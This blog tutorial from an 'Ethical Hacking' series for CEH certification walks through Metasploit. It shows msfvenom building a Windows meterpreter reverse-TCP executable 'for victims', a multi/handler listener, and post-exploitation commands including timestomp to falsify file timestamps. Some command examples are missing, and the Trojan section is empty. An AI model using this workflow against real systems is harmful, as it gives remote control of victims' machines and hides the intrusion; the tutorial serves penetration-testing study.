Ethical Hacking – Metasploit

During the CEH v10 certification you will get to know a lot of tools that helps you with the 5 phases of a hack.

One of the most valuable tools out there is Metasploit.

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

I will go through some of ways you can use Metasploit to your advantage.

This post is part of a series called “Ethical Hacking”.

How-To Use Metasploit

To open the Metasploit console in Kali Linux, run the following in a terminal.

You are able to search after modules, by using.

When you want to use a module (in this example we are using SNMP enumaration), then type.

It can be difficult to remember all the different features and functions (options) within a module.

When you want to set an option (in this example we set the RHOSTS with an IP address in the “auxiliary/scanner/snmp/snmp_enum” module).

To execute the module use.

How-To Create a Payload

To create a payload for victims.

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> –format=exe > <filename.exe>
    • -p windows/meterpreter/reverse_tcp = Use a TCP reverse stateful connection as a payload.
    • LHOST = What ip/dns the payload should contact.
    • LPORT = What port the payload should contact.
    • –format = Which format that should be used.
    • > = Output to file name.
  • service apache2 start
    • Starts the Apache2 webserver.

Open the Metasploit Console.

  • msfconsole
    • Starts the Metasploit Console.

Now we need to establish a listener for the payload we created with msfvenom.

  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
      • Choose which payload is used on the victim.
    • set LHOST <ip>
      • Choose what IP to listen on.
    • set LPORT <port>
      • Choose what port to listen on.
    • exploit -j -z
      • exploit = Start the exploit.
      • -j = Run in context of a job.
      • -z = Do not interact with the session after sucessful exploitation.

When the victim opens the payload, it will automatically connect to the server. You can now interact with the session with the following commands.

Open the Metasploit Console.

  • msfconsole
    • Starts the Metasploit Console.

To see what sessions is connected to the payload.

  • session -i
    • Displays all sessions

You can now interact with a specific session.

  • session -i <session id>
    • Interact with a specific session

If you want to know what folder you are at on the victim.

  • pwd
    • See what folder you are in on the victim.

You can also get more information on a machine by using the following.

  • sysinfo
    • Gets computer name, OS, architecture, system language, domain etc.

See the current ip configuration on the victim.

  • ipconfig
    • Show all network interfaces.

Get the user launched the file.

  • getuid
    • Displays the current user interacting with the session.

See or manipulate timestamp on a file.

  • timestomp <filename>
    • Manipulate with timestamps on files on the victim machine.

For more commands check this text document.

How-to Create a Trojan


Experienced advanced operations engineer with a demonstrated history of working in the information technology and services industry. Skilled in Windows Server, Azure, Ethical Hacking, Office 365, Exchange, Jenkins, SCCM, Octopus Deploy and PowerShell to name a few. Strong engineering professional with a big passion for knowledge.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.